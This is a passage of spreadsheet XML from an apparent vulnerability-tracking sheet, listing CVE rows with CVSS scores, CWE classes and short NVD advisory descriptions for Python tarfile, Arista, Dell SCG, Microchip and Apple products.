      <c r="L1060" s="5" t="inlineStr"/>
      <c r="M1060" s="5" t="inlineStr"/>
      <c r="N1060" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1060" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1060" s="5" t="inlineStr"/>
      <c r="Q1060" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="R1060" s="5" t="inlineStr">
        <is>
          <t>When tarfile extracts a link on a system that doesn't support links, it falls back to extracting a member from the archive. In this case, the filter function is run twice: once for the extracted member, and once with name set to the location of the link. For one of the calls, the return value was ignored. Instead, the member should be skipped if either call returns None.</t>
        </is>
      </c>
      <c r="S1060" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87910</t>
        </is>
      </c>
    </row>
    <row r="1061">
      <c r="A1061" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1061" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1061" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75944</t>
        </is>
      </c>
      <c r="D1061" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="E1061" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1061" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G1061" s="5" t="inlineStr"/>
      <c r="H1061" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1061" s="5" t="inlineStr"/>
      <c r="J1061" s="5" t="inlineStr"/>
      <c r="K1061" s="5" t="inlineStr"/>
      <c r="L1061" s="5" t="inlineStr"/>
      <c r="M1061" s="5" t="inlineStr"/>
      <c r="N1061" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1061" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1061" s="5" t="inlineStr"/>
      <c r="Q1061" s="5" t="inlineStr">
        <is>
          <t>CWE-459</t>
        </is>
      </c>
      <c r="R1061" s="5" t="inlineStr">
        <is>
          <t>A race condition during supplicant re-authentication may leave a stale ACL entry that persists in the system. If the AclAgent subsequently restarts, this stale entry may be applied to new supplicants, resulting in incorrect access control enforcement. User interaction (an AclAgent restart by an administrator) is required for the unintended behavior to take effect.</t>
        </is>
      </c>
      <c r="S1061" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75944</t>
        </is>
      </c>
    </row>
    <row r="1062">
      <c r="A1062" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1062" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1062" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79642</t>
        </is>
      </c>
      <c r="D1062" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="E1062" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1062" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1062" s="5" t="inlineStr"/>
      <c r="H1062" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1062" s="5" t="inlineStr"/>
      <c r="J1062" s="5" t="inlineStr"/>
      <c r="K1062" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1062" s="5" t="inlineStr"/>
      <c r="M1062" s="5" t="inlineStr"/>
      <c r="N1062" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1062" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P1062" s="5" t="inlineStr"/>
      <c r="Q1062" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R1062" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Certificate Validation vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="S1062" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79642</t>
        </is>
      </c>
    </row>
    <row r="1063">
      <c r="A1063" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1063" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1063" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79970</t>
        </is>
      </c>
      <c r="D1063" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="E1063" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1063" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1063" s="5" t="inlineStr"/>
      <c r="H1063" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1063" s="5" t="inlineStr"/>
      <c r="J1063" s="5" t="inlineStr"/>
      <c r="K1063" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1063" s="5" t="inlineStr"/>
      <c r="M1063" s="5" t="inlineStr"/>
      <c r="N1063" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1063" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1063" s="5" t="inlineStr"/>
      <c r="Q1063" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R1063" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Verification of Cryptographic Signature vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to protection mechanism bypass.</t>
        </is>
      </c>
      <c r="S1063" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79970</t>
        </is>
      </c>
    </row>
    <row r="1064">
      <c r="A1064" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1064" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1064" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89172</t>
        </is>
      </c>
      <c r="D1064" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="E1064" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1064" s="5" t="inlineStr">
        <is>
          <t>dc3f6da9-85b5-4a73-84a2-2ec90b40fca5</t>
        </is>
      </c>
      <c r="G1064" s="5" t="inlineStr"/>
      <c r="H1064" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1064" s="5" t="inlineStr"/>
      <c r="J1064" s="5" t="inlineStr"/>
      <c r="K1064" s="5" t="inlineStr"/>
      <c r="L1064" s="5" t="inlineStr"/>
      <c r="M1064" s="5" t="inlineStr"/>
      <c r="N1064" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1064" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="P1064" s="5" t="inlineStr"/>
      <c r="Q1064" s="5" t="inlineStr">
        <is>
          <t>CWE-1300</t>
        </is>
      </c>
      <c r="R1064" s="5" t="inlineStr">
        <is>
          <t>Improper protection of physical side channels vulnerability in Microchip AN1044, Microchip AN953, and Microchip SW300052.
This issue affects AN1044: through A; AN953: through A; SW300052: through 2.6.</t>
        </is>
      </c>
      <c r="S1064" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89172</t>
        </is>
      </c>
    </row>
    <row r="1065">
      <c r="A1065" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1065" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1065" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28899</t>
        </is>
      </c>
      <c r="D1065" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1065" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1065" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1065" s="5" t="inlineStr"/>
      <c r="H1065" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1065" s="5" t="inlineStr"/>
      <c r="J1065" s="5" t="inlineStr"/>
      <c r="K1065" s="5" t="inlineStr"/>
      <c r="L1065" s="5" t="inlineStr"/>
      <c r="M1065" s="5" t="inlineStr"/>
      <c r="N1065" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1065" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1065" s="5" t="inlineStr"/>
      <c r="Q1065" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R1065" s="5" t="inlineStr">
        <is>
          <t>A logic issue was addressed with improved checks. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.6, macOS Tahoe 26.7. An app may bypass Gatekeeper checks.</t>
        </is>
      </c>
      <c r="S1065" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28899</t>
        </is>
      </c>
    </row>
    <row r="1066">
      <c r="A1066" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1066" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1066" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43741</t>
        </is>
      </c>
      <c r="D1066" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1066" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1066" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1066" s="5" t="inlineStr"/>
      <c r="H1066" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1066" s="5" t="inlineStr"/>
      <c r="J1066" s="5" t="inlineStr"/>
      <c r="K1066" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L1066" s="5" t="inlineStr"/>
      <c r="M1066" s="5" t="inlineStr"/>
      <c r="N1066" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1066" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1066" s="5" t="inlineStr"/>
      <c r="Q1066" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R1066" s="5" t="inlineStr">
        <is>
          <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to access protected user data.</t>
        </is>
      </c>
      <c r="S1066" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43741</t>
        </is>
      </c>
    </row>
    <row r="1067">
      <c r="A1067" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1067" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1067" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43762</t>
        </is>
      </c>
      <c r="D1067" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1067" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1067" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1067" s="5" t="inlineStr"/>
      <c r="H1067" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1067" s="5" t="inlineStr"/>
      <c r="J1067" s="5" t="inlineStr"/>
      <c r="K1067" s="5" t="inlineStr"/>
      <c r="L1067" s="5" t="inlineStr"/>
      <c r="M1067" s="5" t="inlineStr"/>
      <c r="N1067" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1067" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1067" s="5" t="inlineStr"/>
      <c r="Q1067" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R1067" s="5" t="inlineStr">
        <is>
          <t>The issue was addressed with improved checks. This issue is fixed in iOS 26.6 and iPadOS 26.6, macOS Tahoe 26.6, visionOS 26.6. An app may be able to access user-sensitive data.</t>
        </is>
      </c>
      <c r="S1067" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43762</t>
        </is>
      </c>
    </row>
    <row r="1068">
      <c r="A1068" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1068" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1068" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64714</t>
        </is>
      </c>
      <c r="D1068" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1068" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1068" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1068" s="5" t="inlineStr"/>
      <c r="H1068" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1068" s="5" t="inlineStr"/>
      <c r="J1068" s="5" t="inlineStr"/>
      <c r="K1068" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:visionos</t>
        </is>
      </c>
      <c r="L1068" s="5" t="inlineStr"/>
      <c r="M1068" s="5" t="inlineStr"/>
      <c r="N1068" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1068" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1068" s="5" t="inlineStr"/>
      <c r="Q1068" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="R1068" s="5" t="inlineStr">
        <is>
          <t>A memory corruption issue was addressed with improved bounds checking. This issue is fixed in iOS 18.7.10 and iPadOS 18.7.10, macOS Golden Gate 27, macOS Sequoia 15.7.8, macOS Sonoma 14.8.8. Processing a maliciously crafted image may lead to a denial-of-service.</t>
        </is>
      </c>
      <c r="S1068" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64714</t>
        </is>
      </c>
    </row>
    <row r="1069">
      <c r="A1069" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1069" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1069" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64756</t>
        </is>
      </c>
      <c r="D1069" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1069" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1069" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1069" s="5" t="inlineStr"/>
      <c r="H1069" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1069" s="5" t="inlineStr"/>
      <c r="J1069" s="5" t="inlineStr"/>
      <c r="K1069" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos</t>
        </is>
      </c>
      <c r="L1069" s="5" t="inlineStr"/>
      <c r="M1069" s="5" t="inlineStr"/>
      <c r="N1069" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1069" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1069" s="5" t="inlineStr"/>
      <c r="Q1069" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1069" s="5" t="inlineStr">
        <is>
          <t>A path handling issue was addressed with improved validation. This issue is fixed in iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to access user-sensitive data.</t>
        </is>
      </c>
      <c r="S1069" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64756</t>
        </is>
      </c>
    </row>
    <row r="1070">
      <c r="A1070" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1070" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1070" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65345</t>
        </is>
      </c>
      <c r="D1070" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1070" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1070" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1070" s="5" t="inlineStr"/>
      <c r="H1070" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1070" s="5" t="inlineStr"/>
      <c r="J1070" s="5" t="inlineStr"/>
      <c r="K1070" s="5" t="inlineStr"/>
      <c r="L1070" s="5" t="inlineStr"/>
      <c r="M1070" s="5" t="inlineStr"/>
      <c r="N1070" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1070" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1070" s="5" t="inlineStr"/>
      <c r="Q1070" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R1070" s="5" t="inlineStr">
        <is>
          <t>A permissions issue was addressed with additional restrictions. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to access user-sensitive data.</t>
        </is>
      </c>
      <c r="S1070" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65345</t>
        </is>
      </c>
    </row>
    <row r="1071">
      <c r="A1071" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1071" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1071" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65348</t>
        </is>
      </c>
      <c r="D1071" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1071" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1071" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1071" s="5" t="inlineStr"/>
      <c r="H1071" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1071" s="5" t="inlineStr"/>
      <c r="J1071" s="5" t="inlineStr"/>
      <c r="K1071" s="5" t="inlineStr"/>
      <c r="L1071" s="5" t="inlineStr"/>
      <c r="M1071" s="5" t="inlineStr"/>
      <c r="N1071" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1071" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1071" s="5" t="inlineStr"/>
      <c r="Q1071" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="R1071" s="5" t="inlineStr">
        <is>
          <t>A permissions issue was addressed with additional restrictions. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to modify protected parts of the file system.</t>
        </is>
      </c>
      <c r="S1071" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65348</t>
        </is>
      </c>
    </row>
    <row r="1072">
      <c r="A1072" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1072" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1072" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65369</t>
        </is>
      </c>
      <c r="D1072" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1072" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1072" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1072" s="5" t="inlineStr"/>
      <c r="H1072" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1072" s="5" t="inlineStr"/>
      <c r="J1072" s="5" t="inlineStr"/>
      <c r="K1072" s="5" t="inlineStr"/>
      <c r="L1072" s="5" t="inlineStr"/>
      <c r="M1072" s="5" t="inlineStr"/>
      <c r="N1072" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1072" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1072" s="5" t="inlineStr"/>
      <c r="Q1072" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R1072" s="5" t="inlineStr">
        <is>
          <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. A malicious application may bypass Gatekeeper checks.</t>
        </is>
      </c>
      <c r="S1072" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65369</t>
        </is>
      </c>
    </row>
    <row r="1073">
      <c r="A1073" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1073" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1073" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65377</t>
        </is>
      </c>
      <c r="D1073" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1073" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1073" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1073" s="5" t="inlineStr"/>
      <c r="H1073" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1073" s="5" t="inlineStr"/>
      <c r="J1073" s="5" t="inlineStr"/>
      <c r="K1073" s="5" t="inlineStr"/>
      <c r="L1073" s="5" t="inlineStr"/>
      <c r="M1073" s="5" t="inlineStr"/>
      <c r="N1073" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1073" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1073" s="5" t="inlineStr"/>
      <c r="Q1073" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-416</t>
        </is>
      </c>
      <c r="R1073" s="5" t="inlineStr">
        <is>
          <t>A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. An app may be able to cause unexpected system termination.</t>
        </is>
      </c>
      <c r="S1073" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65377</t>
        </is>
      </c>
    </row>
    <row r="1074">
      <c r="A1074" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1074" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1074" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65380</t>
        </is>
      </c>
      <c r="D1074" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1074" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1074" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1074" s="5" t="inlineStr"/>
      <c r="H1074" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1074" s="5" t="inlineStr"/>
      <c r="J1074" s="5" t="inlineStr"/>
      <c r="K1074" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L1074" s="5" t="inlineStr"/>
      <c r="M1074" s="5" t="inlineStr"/>
      <c r="N1074" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1074" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1074" s="5" t="inlineStr"/>
      <c r="Q1074" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-863</t>
        </is>
      </c>
      <c r="R1074" s="5" t="inlineStr">
        <is>
          <t>An issue existed in the handling of snapshots. The issue was resolved with improved permissions logic. This issue is fixed in macOS Golden Gate 27. An app may be able to access protected user data.</t>
        </is>
      </c>
      <c r="S1074" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65380</t>
        </is>
      </c>
    </row>
    <row r="1075">
      <c r="A1075" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1075" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1075" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65382</t>
        </is>
      </c>
      <c r="D1075" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1075" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1075" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1075" s="5" t="inlineStr"/>
      <c r="H1075" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1075" s="5" t="inlineStr"/>
      <c r="J1075" s="5" t="inlineStr"/>
      <c r="K1075" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L1075" s="5" t="inlineStr"/>
      <c r="M1075" s="5" t="inlineStr"/>
      <c r="N1075" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1075" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1075" s="5" t="inlineStr"/>
      <c r="Q1075" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1075" s="5" t="inlineStr">
        <is>
          <t>A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to access sensitive user data.</t>
        </is>
      </c>
      <c r="S1075" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65382</t>
        </is>
      </c>
    </row>
    <row r="1076">
      <c r="A1076" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1076" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1076" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65393</t>
        </is>
      </c>
      <c r="D1076" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1076" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1076" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1076" s="5" t="inlineStr"/>
      <c r="H1076" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1076" s="5" t="inlineStr"/>
      <c r="J1076" s="5" t="inlineStr"/>
      <c r="K1076" s="5" t="inlineStr">
        <is>
          <t>apple:macos, apple:xcode</t>
        </is>
      </c>
      <c r="L1076" s="5" t="inlineStr"/>
      <c r="M1076" s="5" t="inlineStr"/>
      <c r="N1076" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1076" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1076" s="5" t="inlineStr"/>
      <c r="Q1076" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1076" s="5" t="inlineStr">
        <is>
          <t>A permissions issue was addressed with improved validation. This issue is fixed in Xcode 27, macOS Golden Gate 27. An app may be able to access user-sensitive data.</t>
        </is>
      </c>
      <c r="S1076" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65393</t>
        </is>
      </c>
    </row>
    <row r="1077">
      <c r="A1077" s="5" t="inlineStr">
